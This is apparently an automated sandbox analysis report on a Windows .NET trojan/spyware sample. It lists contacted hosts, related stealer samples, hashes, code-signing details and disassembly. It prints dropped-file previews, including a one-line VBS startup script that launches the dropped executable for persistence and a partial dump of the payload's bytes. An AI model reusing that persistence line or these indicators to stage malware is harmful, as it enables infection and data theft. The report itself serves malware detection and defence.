                                                              https://stackoverflow.com/q/11564914/23354;Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://stackoverflow.com/q/2152978/23354Ref#60031796.exe, 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2367253586.00000000070F0000.00000004.08000000.00040000.00000000.sdmp, Ref#60031796.exe, 00000000.00000002.2357319019.0000000003E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ssl.com/repository0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                                    high
                                                                    http://ocsps.ssl.com0_Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                                      high
                                                                      https://oshi.atDvdvfyt.exe, 00000005.00000002.3361181229.0000000003218000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRef#60031796.exe, 00000000.00000002.2347570758.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3361572023.0000000002861000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.3361181229.00000000031AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0Ref#60031796.exe, vdvfyt.exe.0.drfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          194.15.112.248
                                                                          oshi.atUkraine
                                                                          213354INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBfalse
                                                                          104.26.13.205
                                                                          api.ipify.orgUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          162.254.34.31
                                                                          unknownUnited States
                                                                          64200VIVIDHOSTINGUStrue
                                                                          5.253.86.15
                                                                          unknownCyprus
                                                                          208046HOSTSLICK-GERMANYNLfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1567429
                                                                          Start date and time:2024-12-03 15:19:49 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 22s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:7
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Ref#60031796.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@6/3@3/4
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 92%
                                                                          • Number of executed functions: 265
                                                                          • Number of non-executed functions: 42
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: Ref#60031796.exe
                                                                          TimeTypeDescription
                                                                          09:20:40API Interceptor102x Sleep call for process: Ref#60031796.exe modified
                                                                          09:21:06API Interceptor37x Sleep call for process: InstallUtil.exe modified
                                                                          09:21:13API Interceptor470099x Sleep call for process: vdvfyt.exe modified
                                                                          15:21:04AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          194.15.112.248Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                            KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                              KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                  uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                    W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                      104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                      • api.ipify.org/
                                                                                      Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                      • api.ipify.org/
                                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                                      • api.ipify.org/
                                                                                      162.254.34.31Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                          Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                            Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                              Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                  Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                    SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                      D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          oshi.atRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 5.253.86.15
                                                                                                          Swift Payment MT103.lnkGet hashmaliciousUnknownBrowse
                                                                                                          • 188.241.120.6
                                                                                                          Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                          • 188.241.120.6
                                                                                                          Facturation.exeGet hashmaliciousDoeneriumBrowse
                                                                                                          • 188.241.120.6
                                                                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.248
                                                                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.248
                                                                                                          JuneOrder.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                          • 5.253.86.15
                                                                                                          Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                          • 194.15.112.248
                                                                                                          jdconstructnOrderfdp..exeGet hashmaliciousBabadeda, PureLog Stealer, Quasar, zgRATBrowse
                                                                                                          • 188.241.120.6
                                                                                                          api.ipify.orgRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          main.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.74.152
                                                                                                          https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Content Collaboration Terms.dll.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          • 172.67.74.152
                                                                                                          https://apnasofa.com/episode/index#YmVuQG1pY3Jvc29mdC5jb20==Get hashmaliciousUnknownBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Employee_Important_Message.pdfGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          l6F8Xgr0Ov.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          SPlVyHiGOz.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          bg.microsoft.map.fastly.netuC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.214.172
                                                                                                          Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 199.232.214.172
                                                                                                          NLNIOm0w6y.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.214.172
                                                                                                          JEM PLATBY.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.214.172
                                                                                                          KvG1NAXkgp9PxQb.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 199.232.214.172
                                                                                                          Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.210.172
                                                                                                          Pagamento deposito e fattura proforma firmata.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.214.172
                                                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                          • 199.232.214.172
                                                                                                          phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                                                                          • 199.232.210.172
                                                                                                          001.xlsGet hashmaliciousGet2DownloaderBrowse
                                                                                                          • 199.232.214.172
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGBRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.248
                                                                                                          KyrazonSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.248
                                                                                                          Order._1.exeGet hashmaliciousAsyncRAT, Babadeda, PureLog Stealer, zgRATBrowse
                                                                                                          • 194.15.112.248
                                                                                                          uVQLD8YVk6.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                          • 194.15.112.248
                                                                                                          W73PCbSH71.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoaderBrowse
                                                                                                          • 194.15.112.248
                                                                                                          1pXdiCesZ6.exeGet hashmaliciousDanaBotBrowse
                                                                                                          • 194.15.112.203
                                                                                                          bad.pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.113.200
                                                                                                          FromRussiaWithLove.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.70
                                                                                                          x.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.113.210
                                                                                                          CLOUDFLARENETUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.6
                                                                                                          BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.194.230
                                                                                                          SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.6
                                                                                                          2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.194.230
                                                                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 172.67.201.49
                                                                                                          2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.6
                                                                                                          VIVIDHOSTINGUSRef#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          DJ5PhUwOsM.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                          • 162.254.34.31
                                                                                                          Ref#2056119.exeGet hashmaliciousAgentTesla, XWormBrowse
                                                                                                          • 162.254.34.31
                                                                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 192.26.155.193
                                                                                                          Ref#501032.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 162.254.34.31
                                                                                                          Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 162.254.34.31
                                                                                                          BankInformation.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          Booking_0731520.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          SWIFTCOPY202973783.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          D6yz87XjgM.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 162.254.34.31
                                                                                                          HOSTSLICK-GERMANYNLRef#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 5.253.86.15
                                                                                                          an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                          • 193.142.146.64
                                                                                                          an_api.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          build.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          ub16vsLP6y.zipGet hashmaliciousRemcosBrowse
                                                                                                          • 193.142.146.203
                                                                                                          ISehgzqm2V.zipGet hashmaliciousRemcosBrowse
                                                                                                          • 193.142.146.203
                                                                                                          Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          Form-8879_PDF.jarGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.64
                                                                                                          bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 193.142.146.43
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                          • 194.15.112.248
                                                                                                          • 104.26.13.205
                                                                                                          • 5.253.86.15
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):84
                                                                                                          Entropy (8bit):4.788707608442598
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:FER/n0eFHHoN+EaKC5NkOAHn:FER/lFHIN7aZ5WOO
                                                                                                          MD5:53B3D1B5924EB569FE27261293C7F23D
                                                                                                          SHA1:4F51CFE9EA01334071F43998786A082799188553
                                                                                                          SHA-256:F73CBEF4A35F378A34AC6313EC2966878B1A3D1CA281011E9F51486788FF23CD
                                                                                                          SHA-512:25E902328246792637891E9B61F61F83253327DFD7C8D5C31F22D81487974F9C7BDCAFBD6EE5176FB2AF3F3E230C7A04EE9E0348C22296AD529DEEA3FBB568A2
                                                                                                          Malicious:true
                                                                                                          Reputation:low
                                                                                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\vdvfyt.exe"""
                                                                                                          Process:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):221664
                                                                                                          Entropy (8bit):5.726317811710196
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:tO9M5DN75XhrggS/mKjnfzhzFvkCwf32v0whH0ixM:tO8Nea
                                                                                                          MD5:654AD72D10AED979428B6B130700754A
                                                                                                          SHA1:68B0DB31A9CAB6FCC804DC6932D44D9081B14C14
                                                                                                          SHA-256:2F9639175E04906207564913E4C0493B196F59DD4BC8F62DEEA0ECECB4346891
                                                                                                          SHA-512:64447CAFF7BA9D358624F85B1AD00ABEAFE46E84703F69828F8E3F452145044FB6FBF1BF2BE71F7F32C946091298462C2E681370E5CC5A2B03614360C7EA9BEA
                                                                                                          Malicious:true
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          • Antivirus: ReversingLabs, Detection: 13%
                                                                                                          Reputation:low
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng.................0...........O... ...`....@.. ....................................`.................................8O..J....`..N............D............................................................... ............... ..H............text..../... ...0.................. ..`.rsrc...N....`.......2..............@..@.reloc...............B..............@..B................hO......H...........(M..........................................................Vs....%(....+.*(^...+.....(....*>+......*s....+...(....*v+.+.r...p+.*.+.o....+.o ...+..."..}%...*...^.....b...b`..b`.`}%...*r. ....n...bj`..bj`.j`m}%...*....+.+.+.+.+.+.+.+"*.+..+.(....+..+.(....+..+.(....+.s....+....+.+.+.+.+.+.+.+"*.+.(....+..+..+.(....+..+.(....+.s....+....+.+.+.+.+.+.+.+"*.+.(....+..+.(....+..+..+.(....+.s....+....+.+.+.+.+.+.+!+"*.+.(....+..+.(....+..+.(....+..+.s....+...V+.{%.....d
                                                                                                          Process:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):26
                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Entropy (8bit):5.726317811710196
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:Ref#60031796.exe
                                                                                                          File size:221'664 bytes
                                                                                                          MD5:654ad72d10aed979428b6b130700754a
                                                                                                          SHA1:68b0db31a9cab6fcc804dc6932d44d9081b14c14
                                                                                                          SHA256:2f9639175e04906207564913e4c0493b196f59dd4bc8f62deea0ececb4346891
                                                                                                          SHA512:64447caff7ba9d358624f85b1ad00abeafe46e84703f69828f8e3f452145044fb6fbf1bf2be71f7f32c946091298462c2e681370e5cc5a2b03614360c7ea9bea
                                                                                                          SSDEEP:6144:tO9M5DN75XhrggS/mKjnfzhzFvkCwf32v0whH0ixM:tO8Nea
                                                                                                          TLSH:A6243229E3C0E8EFDC81B73230572B1777349D80AB9F8E06AD61B5EC1DB17C62596198
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ng.................0...........O... ...`....@.. ....................................`................................
                                                                                                          Icon Hash:b04a484c4c4a4eb0
                                                                                                          Entrypoint:0x424f82
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:true
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x674EF1D0 [Tue Dec 3 11:56:00 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                          Signature Valid:false
                                                                                                          Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                          Error Number:-2146869232
                                                                                                          Not Before, Not After
                                                                                                          • 04/07/2024 00:35:32 15/05/2027 11:15:04
                                                                                                          Subject Chain
                                                                                                          • OID.1.3.6.1.4.1.311.60.2.1.3=VN, OID.2.5.4.15=Private Organization, CN="DUC FABULOUS CO.,LTD", SERIALNUMBER=0105838409, O="DUC FABULOUS CO.,LTD", L=Hanoi, C=VN
                                                                                                          Version:3
                                                                                                          Thumbprint MD5:FF0E889D2A73C3A679605952D35452DC
                                                                                                          Thumbprint SHA-1:2C1D12F8BBE0827400A8440AF74FFFA8DCC8097C
                                                                                                          Thumbprint SHA-256:A73352D67693AA16BCE2F182B15891F0F23EA0485CC18938686AAFDEE7B743E3
                                                                                                          Serial:6DD2E3173995F51BFAC1D9FB4CB200C1
                                                                                                          Instruction
                                                                                                          jmp dword ptr [00402000h]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x24f380x4a.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x10e4e.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x344000x1de0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x380000xc.reloc
